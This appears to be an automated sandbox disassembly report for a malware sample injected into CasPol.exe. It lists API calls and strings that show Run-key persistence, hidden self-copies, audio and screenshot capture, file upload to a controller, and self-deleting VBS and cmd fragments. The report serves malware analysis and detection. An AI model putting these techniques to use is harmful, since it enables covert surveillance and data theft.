                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                            • API String ID: 3797177996-2557013105
                            • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                            • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                            • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                            • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                            • ExitProcess.KERNEL32(00000000), ref: 004124A0
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                            • CloseHandle.KERNEL32(00000000), ref: 0041253B
                            • GetCurrentProcessId.KERNEL32 ref: 00412541
                            • PathFileExistsW.SHLWAPI(?), ref: 00412572
                            • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                            • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                              • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                            • Sleep.KERNEL32(000001F4), ref: 00412682
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                            • CloseHandle.KERNEL32(00000000), ref: 004126A9
                            • GetCurrentProcessId.KERNEL32 ref: 004126AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                            • String ID: .exe$8SG$WDH$exepath$open$temp_
                            • API String ID: 2649220323-436679193
                            • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                            • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                            • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                            • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                            APIs
                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                            • SetEvent.KERNEL32 ref: 0041B219
                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                            • CloseHandle.KERNEL32 ref: 0041B23A
                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                            • API String ID: 738084811-2094122233
                            • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                            • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                            • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                            • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                            • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                            • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                            • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$Create
                            • String ID: RIFF$WAVE$data$fmt
                            • API String ID: 1602526932-4212202414
                            • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                            • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                            • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                            • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                            • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                            • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                            • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                            • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                            • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                            • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                            • API String ID: 1646373207-165202446
                            • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                            • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                            • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                            • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                            APIs
                            • _wcslen.LIBCMT ref: 0040CE07
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                            • _wcslen.LIBCMT ref: 0040CEE6
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040CF84
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                            • _wcslen.LIBCMT ref: 0040CFC6
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                            • ExitProcess.KERNEL32 ref: 0040D062
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open
                            • API String ID: 1579085052-4130102134
                            • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                            • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                            • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                            • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                            APIs
                            • lstrlenW.KERNEL32(?), ref: 0041C036
                            • _memcmp.LIBVCRUNTIME ref: 0041C04E
                            • lstrlenW.KERNEL32(?), ref: 0041C067
                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                            • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                            • _wcslen.LIBCMT ref: 0041C13B
                            • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                            • GetLastError.KERNEL32 ref: 0041C173
                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                            • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                            • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                            • GetLastError.KERNEL32 ref: 0041C1D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                            • String ID: ?
                            • API String ID: 3941738427-1684325040
                            • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                            • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                            • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                            • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$EnvironmentVariable$_wcschr
                            • String ID:
                            • API String ID: 3899193279-0
                            • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                            • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                            • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                            • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                              • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                              • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                            • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                            • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                            • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                            • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                            • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                            • Sleep.KERNEL32(00000064), ref: 00412E94
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                            • String ID: /stext "$0TG$0TG$NG$NG
                            • API String ID: 1223786279-2576077980
                            • Opcode ID: 3d0323ce1c9d0b8fdd539b767e1f21648be4e9102a5c9b14e4e64c444153522c
                            • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                            • Opcode Fuzzy Hash: 3d0323ce1c9d0b8fdd539b767e1f21648be4e9102a5c9b14e4e64c444153522c
                            • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                            • LoadLibraryA.KERNEL32(?), ref: 00414E17
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                            • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                            • LoadLibraryA.KERNEL32(?), ref: 00414E76
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                            • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                            • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                            • API String ID: 2490988753-744132762
                            • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                            • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                            • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                            • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                            • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumOpen
                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                            • API String ID: 1332880857-3714951968
                            • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                            • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                            • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                            • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                            APIs
                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                            • GetCursorPos.USER32(?), ref: 0041D5E9
                            • SetForegroundWindow.USER32(?), ref: 0041D5F2
                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                            • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                            • ExitProcess.KERNEL32 ref: 0041D665
                            • CreatePopupMenu.USER32 ref: 0041D66B
                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                            • String ID: Close
                            • API String ID: 1657328048-3535843008
                            • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                            • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                            • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                            • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$Info
                            • String ID:
                            • API String ID: 2509303402-0
                            • Opcode ID: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                            • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                            • Opcode Fuzzy Hash: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                            • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                            • __aulldiv.LIBCMT ref: 00408D4D
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                            • CloseHandle.KERNEL32(00000000), ref: 00408F64
                            • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                            • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                            Strings
                            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                            • API String ID: 3086580692-2582957567
                            APIs
                            • Sleep.KERNEL32(00001388), ref: 0040A740
                              • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                              • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                              • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                              • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                            Strings
                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                            • String ID: 8SG$8SG$pQG$pQG$PG$PG
                            • API String ID: 3795512280-1152054767
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0045130A
                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                              • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                              • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                              • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                            • _free.LIBCMT ref: 004512FF
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00451321
                            • _free.LIBCMT ref: 00451336
                            • _free.LIBCMT ref: 00451341
                            • _free.LIBCMT ref: 00451363
                            • _free.LIBCMT ref: 00451376
                            • _free.LIBCMT ref: 00451384
                            • _free.LIBCMT ref: 0045138F
                            • _free.LIBCMT ref: 004513C7
                            • _free.LIBCMT ref: 004513CE
                            • _free.LIBCMT ref: 004513EB
                            • _free.LIBCMT ref: 00451403
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00419FB9
                            • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                            • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                            • GetLocalTime.KERNEL32(?), ref: 0041A105
                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                            Strings
                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                            • API String ID: 489098229-1431523004
                            APIs
                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                              • Part of subcall function 004136F8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                              • Part of subcall function 004136F8: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                              • Part of subcall function 004136F8: RegCloseKey.KERNELBASE(00000000), ref: 00413738
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                            • ExitProcess.KERNEL32 ref: 0040D9C4
                            Strings
                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                            • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                            • API String ID: 1913171305-3159800282
                            APIs
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                            • closesocket.WS2_32(000000FF), ref: 00404E5A
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
